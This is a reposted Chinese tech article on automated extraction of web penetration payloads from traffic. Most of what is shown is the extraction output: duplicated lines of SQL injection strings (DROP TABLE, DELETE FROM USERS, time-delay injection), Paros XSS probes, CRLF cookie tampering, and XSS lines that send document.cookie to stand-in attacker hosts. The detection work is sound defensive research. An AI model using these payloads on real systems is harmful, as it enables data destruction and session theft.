加入收藏 | 设为首页 | 会员中心 | 我要投稿 好传媒网 (https://www.haochuanmei.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长资讯 > 评论 > 正文

技术讨论 | 自动化Web渗透Payload提取技术

发布时间:2018-10-09 09:21:47 所属栏目:评论 来源:zhanghaoyil
导读:【新品产上线啦】51CTO播客,随时随地,碎片化学习 一、写在前面 做Web安全已经三四年了,从最初的小白到今天的初探门路,小鲜肉已经熬成了油腻大叔。Web安全是一个日新月异的朝阳领域,每天的互联网上都在发生着从未暴露的0 Day和N Day攻击。这时一个大家

提取结果:

  1. ##modo## ##registroalert("Paros");## 
  2. ##modo## ##registroalert("Paros");## 
  3. ##ntc## ##|## 
  4. ##ntc## ##|## 
  5. ##modo## #### 
  6. ##modo## #### 
  7. ##modo## ##registro' AND '1'='1## 
  8. ##modo## ##registro' AND '1'='1## 
  9. ##ntc## ##9851892046707743alert("Paros");## 
  10. ##ntc## ##9851892046707743alert("Paros");## 
  11. ##ntc## ##5024784015351535alert("Paros");## 
  12. ##ntc## ##5024784015351535alert("Paros");## 
  13. ##ntc## ##878731290934670A## 
  14. ##ntc## ##878731290934670A## 
  15. ##nombre## ##Remi'g/*io## 
  16. ##nombre## ##Remi'g/*io## 
  17. ##cp## ##1642A## 
  18. ##cp## ##1642A## 
  19. ##cp## ##any? 
  20. Set-cookie:+Tamper=1041264011025374727## 
  21. ##cp## ##any? 
  22. Set-cookie:+Tamper=1041264011025374727## 
  23. ##dni## ##'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%## 
  24. ##dni## ##'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%## 
  25. ##modo## ##registro@40## 
  26. ##modo## ##registro@40## 
  27. ##ntc## ##841140437746594A## 
  28. ##ntc## ##841140437746594A## 
  29. ##cp## ##31227Set-cookie:+Tamper=1041264011025374727## 
  30. ##cp## ##31227Set-cookie:+Tamper=1041264011025374727## 
  31. ##ntc## ##|## 
  32. ##ntc## ##|## 
  33. ##cp## ##paros"+style="background:url(javascript:alert('Paros'))&id=2## 
  34. ##cp## ##paros"+style="background:url(javascript:alert('Paros'))&id=2## 
  35. ##modo## ##|## 
  36. ##modo## ##|## 
  37. ##cp## ##4377A## 
  38. ##cp## ##4377A## 
  39. ##modo## ##+## 
  40. ##modo## ##+## 
  41. ##modo## ##' DELETE FROM USERS## 
  42. ##modo## ##' DELETE FROM USERS## 
  43. ##dni## #### 
  44. ##dni## #### 
  45. ##cp## #### 
  46. ##cp## #### 
  47. ##ntc## ##9812245040414546','0','0','0','0');waitfor delay '0:0:15';--## 
  48. ##ntc## ##9812245040414546','0','0','0','0');waitfor delay '0:0:15';--## 
  49. ##dni## ##684739141## 
  50. ##dni## ##684739141## 
  51. ##modo## ##registro' DELETE FROM USERS## 
  52. ##modo## ##registro' DELETE FROM USERS## 
  53. ##nombre## ##*Aitan/a## 
  54. ##nombre## ##*Aitan/a## 
  55. ##ntc## ##6995607131571243## 
  56. ##ntc## ##6995607131571243## 
  57. ##modo## ##registroalert("Paros");## 
  58. ##modo## ##registroalert("Paros");## 
  59. ##modo## ##','0','0','0');waitfor delay '0:0:15';--## 
  60. ##modo## ##','0','0','0');waitfor delay '0:0:15';--## 
  61. ##modo## ##registro';waitfor delay '0:0:15';--## 
  62. ##modo## ##registro';waitfor delay '0:0:15';--## 
  63. ##modo## #### 
  64. ##modo## #### 
  65. ##modo## ##registro"><## 
  66. ##modo## ##registro"><## 
  67. ##modo## ##'OR'a='a## 
  68. ##modo## ##'OR'a='a## 
  69. ##cp## ##any 
  70. Set-cookie:+Tamper=5765205567234876235## 
  71. ##cp## ##any 
  72. Set-cookie:+Tamper=5765205567234876235## 
  73. ##dni## ##66367222D'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%## 
  74. ##dni## ##66367222D'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%## 
  75. ##ntc## ##@40## 
  76. ##ntc## ##@40## 
  77. ##cp## ##AND 11=1## 
  78. ##cp## ##AND 11=1## 
  79. ##modo## ##registroAND 11=1## 
  80. ##modo## ##registroAND 11=1## 
  81. ##modo## ##+## 
  82. ##modo## ##+## 
  83. ##modo## ##registrobob@alert(Paros).parosproxy.org## 
  84. ##modo## ##registrobob@alert(Paros).parosproxy.org## 
  85. ##cp## ##any? 
  86. Set-cookie:+Tamper=5765205567234876235## 
  87. ##cp## ##any? 
  88. Set-cookie:+Tamper=5765205567234876235## 
  89. ##dni## ##paros"+style="background:url(javascript:alert('Paros'))&id=2## 
  90. ##dni## ##paros"+style="background:url(javascript:alert('Paros'))&id=2## 
  91. ##cp## ##44349','0');waitfor delay '0:0:15';--## 
  92. ##cp## ##44349','0');waitfor delay '0:0:15';--## 
  93. ##cp## ##sessionid=12312312& username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  94. ##cp## ##sessionid=12312312& username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  95. ##ntc## ##219312393915667A## 
  96. ##ntc## ##219312393915667A## 
  97. ##ntc## ##928497527479202A## 
  98. ##ntc## ##928497527479202A## 
  99. ##ntc## ##848868523325038A## 
  100. ##ntc## ##848868523325038A## 
  101. ##ntc## ##AND 11=1## 
  102. ##ntc## ##AND 11=1## 
  103. ##ntc## ## ## 
  104. ##ntc## ## ## 
  105. ##dni## ##B071B890B48F## 
  106. ##dni## ##B071B890B48F## 
  107. ##modo## ##registro## 
  108. ##modo## ##registro## 
  109. ##cp## ##26130any 
  110. Set-cookie:+Tamper=5765205567234876235## 
  111. ##cp## ##26130any 
  112. Set-cookie:+Tamper=5765205567234876235## 
  113. ##ntc## ##' AND '1'='1## 
  114. ##ntc## ##' AND '1'='1## 
  115. ##modo## ##registro ## 
  116. ##modo## ##registro ## 
  117. ##ntc## ##+## 
  118. ##ntc## ##+## 
  119. ##ntc## ##706790437347227A## 
  120. ##ntc## ##706790437347227A## 
  121. ##cp## ##+## 
  122. ##cp## ##+## 
  123. ##dni## ##';waitfor delay '0:0:15';--## 
  124. ##dni## ##';waitfor delay '0:0:15';--## 
  125. ##cp## ##44721bob@alert(Paros).parosproxy.org## 
  126. ##cp## ##44721bob@alert(Paros).parosproxy.org## 
  127. ##cp## #### 
  128. ##cp## #### 
  129. ##ntc## ##424959116693048A## 
  130. ##ntc## ##424959116693048A## 
  131. ##cp## ##bob@alert(Paros).parosproxy.org## 
  132. ##cp## ##bob@alert(Paros).parosproxy.org## 
  133. ##cp## ##31495bob@alert(Paros).parosproxy.org## 
  134. ##cp## ##31495bob@alert(Paros).parosproxy.org## 
  135. ##ntc## ##899062190611389A## 
  136. ##ntc## ##899062190611389A## 
  137. ##ntc## ##0602317509119469## 
  138. ##ntc## ##0602317509119469## 
  139. ##modo## ##','0');waitfor delay '0:0:15';--## 
  140. ##modo## ##','0');waitfor delay '0:0:15';--## 
  141. ##dni## ##' AND '1'='1## 
  142. ##dni## ##' AND '1'='1## 
  143. ##modo## ##registro','0','0','0','0');waitfor delay '0:0:15';--## 
  144. ##modo## ##registro','0','0','0','0');waitfor delay '0:0:15';--## 
  145. ##dni## ##64105812Mparos"+style="background:url(javascript:alert('Paros'))&id=2## 
  146. ##dni## ##64105812Mparos"+style="background:url(javascript:alert('Paros'))&id=2## 
  147. ##modo## ##sessionid=12312312& username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  148. ##modo## ##sessionid=12312312& username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  149. ##cp## ##22314','0','0');waitfor delay '0:0:15';--## 
  150. ##cp## ##22314','0','0');waitfor delay '0:0:15';--## 
  151. ##modo## ##sessionid=12312312& username=document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie?## 
  152. ##modo## ##sessionid=12312312& username=document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie?## 
  153. ##modo## ##registro@40## 
  154. ##modo## ##registro@40## 
  155. ##dni## ##35507034W" AND "1"="1## 
  156. ##dni## ##35507034W" AND "1"="1## 
  157. ##modo## ##registroSet-cookie:+Tamper=1041264011025374727## 
  158. ##modo## ##registroSet-cookie:+Tamper=1041264011025374727## 
  159. ##cp## ##','0','0','0','0');waitfor delay '0:0:15';--## 
  160. ##cp## ##','0','0','0','0');waitfor delay '0:0:15';--## 
  161. ##cp## ##08696paros" style="background:url(javascript:alert('Paros'))## 
  162. ##cp## ##08696paros" style="background:url(javascript:alert('Paros'))## 
  163. ##dni## ##paros" style="background:url(javascript:alert('Paros'))## 
  164. ##dni## ##paros" style="background:url(javascript:alert('Paros'))## 
  165. ##cp## ##0530A## 
  166. ##cp## ##0530A## 
  167. ##ntc## ##any 
  168. Set-cookie:+Tamper=5765205567234876235## 
  169. ##ntc## ##any 
  170. Set-cookie:+Tamper=5765205567234876235## 
  171. ##cp## ##0951A## 
  172. ##cp## ##0951A## 
  173. ##ntc## ##any? 
  174. Set-cookie:+Tamper=5765205567234876235## 
  175. ##ntc## ##any? 
  176. Set-cookie:+Tamper=5765205567234876235## 
  177. ##modo## ##registro"><## 
  178. ##modo## ##registro"><## 
  179. ##modo## ##registrosessionid=12312312& username=document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</s cript>?## 
  180. ##modo## ##registrosessionid=12312312& username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</s cript>?## 
  181. ##cp## ##1883A## 
  182. ##cp## ##1883A## 
  183. ##ntc## ##1816581279872417'OR'a='a## 
  184. ##ntc## ##1816581279872417'OR'a='a## 
  185. ##modo## ##registrosessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  186. ##modo## ##registrosessionid=12312312& username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  187. ##modo## ##');waitfor delay '0:0:15';--## 
  188. ##modo## ##');waitfor delay '0:0:15';--## 
  189. ##modo## ##registro'INJECTED_PARAM## 
  190. ##modo## ##registro'INJECTED_PARAM## 
  191. ##dni## ##83627503D','0','0','0');waitfor delay '0:0:15';--## 
  192. ##dni## ##83627503D','0','0','0');waitfor delay '0:0:15';--## 
  193. ##cp## ##1914A## 
  194. ##cp## ##1914A## 
  195. ##cp## ##35543' DELETE FROM USERS## 
  196. ##cp## ##35543' DELETE FROM USERS## 
  197. ##ntc## ##@40## 
  198. ##ntc## ##@40## 
  199. ##cp## ##alert("Paros");## 
  200. ##cp## ##alert("Paros");## 
  201. ##ntc## ##0358024000873525bob@alert(Paros).parosproxy.org## 
  202. ##ntc## ##0358024000873525bob@alert(Paros).parosproxy.org## 
  203. ##modo## ##|## 
  204. ##modo## ##|## 
  205. ##ntc## ##alert("Paros");## 
  206. ##ntc## ##alert("Paros");## 
  207. ##ntc## ##367411357982441A## 
  208. ##ntc## ##367411357982441A## 
  209. ##cp## ##';waitfor delay '0:0:15';--## 
  210. ##cp## ##';waitfor delay '0:0:15';--## 
  211. ##ntc## ##6031155114009786bob@alert(Paros).parosproxy.org## 
  212. ##ntc## ##6031155114009786bob@alert(Paros).parosproxy.org## 
  213. ##modo## ##|## 
  214. ##modo## ##|## 
  215. ##ntc## ##7238071991283064 ## 
  216. ##ntc## ##7238071991283064 ## 
  217. ##cp## ##0529A## 
  218. ##cp## ##0529A## 
  219. ##modo## ##'INJECTED_PARAM## 
  220. ##modo## ##'INJECTED_PARAM## 
  221. ##dni## ##+## 
  222. ##dni## ##+## 
  223. ##modo## ##registrosessionid=12312312& username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  224. ##modo## ##registrosessionid=12312312& username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  225. ##dni## #### 
  226. ##dni## #### 
  227. ##modo## ##registro@40## 
  228. ##modo## ##registro@40## 
  229. ##cp## ##46715alert("Paros");## 
  230. ##cp## ##46715alert("Paros");## 
  231. ##cp## ##08786Set-cookie:+Tamper=1041264011025374727## 
  232. ##cp## ##08786Set-cookie:+Tamper=1041264011025374727## 
  233. ##modo## ##alert("Paros");## 
  234. ##modo## ##alert("Paros");## 
  235. ##modo## ##"><## 
  236. ##modo## ##"><## 
  237. ##modo## ##registrosessionid=12312312& username=document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</s cript>?## 
  238. ##modo## ##registrosessionid=12312312& username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</s cript>?## 
  239. ##ntc## ##1771682809315400' AND '1'='1## 
  240. ##ntc## ##1771682809315400' AND '1'='1## 

可以看到,至此已经把异常参数值提取出来了,包括SQL注入、XSS、命令注入、CRLF注入、文件包含等典型的攻击Payload。

五、后续计划

(编辑:好传媒网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
相关内容
    推荐文章
    站长推荐
    热点阅读

      【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

      建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

      Copygight © 2008-2022 https://www.haochuanmei.com/ All Rights Reserved. 好传媒网